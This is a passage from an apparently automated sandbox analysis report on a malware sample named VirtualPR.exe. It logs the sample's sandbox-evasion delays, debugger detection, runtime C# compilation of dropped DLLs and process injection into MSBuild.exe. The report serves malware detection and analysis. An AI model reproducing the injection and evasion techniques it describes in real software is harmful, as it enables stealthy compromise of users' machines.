                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: VirtualPR.exe PID: 2184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VirtualPR.exe PID: 2052, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory allocated: 1470000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory allocated: 1680000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory allocated: 60C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory allocated: 70C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory allocated: 73F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory allocated: 83F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory allocated: 5FA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory allocated: 6FA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory allocated: 71D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory allocated: 81D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 360000Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 360000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 360000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5095Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3886Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_22-24982
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ouz2pkol.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\doceyppt.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-77216
                  Source: C:\Users\user\Desktop\VirtualPR.exe TID: 2656Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exe TID: 4924Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exe TID: 432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1864Thread sleep time: -219600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6288Thread sleep time: -10190000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6288Thread sleep time: -7772000s >= -30000sJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exe TID: 3544Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exe TID: 4948Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exe TID: 3816Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6252Thread sleep time: -720000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6252Thread sleep time: -360000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035DE210 FindFirstFileW,FindClose,22_2_035DE210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035F3204 FindFirstFileW,FindClose,22_2_035F3204
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035F36F4 FindFirstFileW,GetLastError,22_2_035F36F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035DDC44 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,22_2_035DDC44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035F1324 GetLogicalDriveStringsW,QueryDosDeviceW,22_2_035F1324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_034101B0 GetSystemInfo,12_2_034101B0
                  Source: C:\Users\user\Desktop\VirtualPR.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 360000Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 360000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 360000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: MSBuild.exe, 00000016.00000002.2387840389.00000000016A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                  Source: VirtualPR.exe, 00000000.00000002.2191331562.00000000014F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=n
                  Source: MSBuild.exe, 0000000C.00000002.4556405379.0000000001258000.00000004.00000020.00020000.00000000.sdmp, VirtualPR.exe, 0000000E.00000002.2374762048.0000000001031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_22-25578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA75CC LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,22_2_03AA75CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_02E70777 mov eax, dword ptr fs:[00000030h]12_2_02E70777
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03040777 mov eax, dword ptr fs:[00000030h]22_2_03040777
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA71F4 VirtualAlloc,VirtualAlloc,GetProcessHeap,RtlAllocateHeap,VirtualFree,GetNativeSystemInfo,VirtualAlloc,22_2_03AA71F4
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 0.2.VirtualPR.exe.56a0000.9.raw.unpack, SetVeloCity.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                  Source: 0.2.VirtualPR.exe.56a0000.9.raw.unpack, SetVeloCity.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                  Source: 0.2.VirtualPR.exe.56a0000.9.raw.unpack, SetVeloCity.csReference to suspicious API methods: VirtualAllocExAction(processInformation.ProcessHandle, num2, length, 12288, 64)
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeFile written: C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.0.csJump to dropped file
                  Source: C:\Users\user\Desktop\VirtualPR.exeFile written: C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.0.csJump to dropped file
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 984000Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 985000Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 986000Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1089008Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 984000Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 985000Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 986000Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 10ED008Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.cmdline"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6976.tmp" "c:\Users\user\AppData\Local\Temp\wbuje1zp\CSCF3101B1DB5FD4234B8D9E3A32E163AE3.TMP"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6F42.tmp" "c:\Users\user\AppData\Local\Temp\saruzovf\CSC9247E5327A274F0EA6778942D33863E.TMP"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\doceyppt.cmdline"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ouz2pkol.cmdline"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAE8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC5102464C238E498091ADEB255F7180.TMP"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB6AC.tmp" "c:\Users\user\AppData\Local\Temp\CSCEC34565AAA024FAC8226FC17CD3A3374.TMP"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA80E4 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,AllocateAndInitializeSid,EqualSid,FreeSid,22_2_03AA80E4
                  Source: MSBuild.exeBinary or memory string: Shell_TrayWnd
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndSysPagerToolbarWindow32U
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: explorer.exeShell_TrayWnd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03407BC8 cpuid 12_2_03407BC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,22_2_035DE348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,22_2_035DD7E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
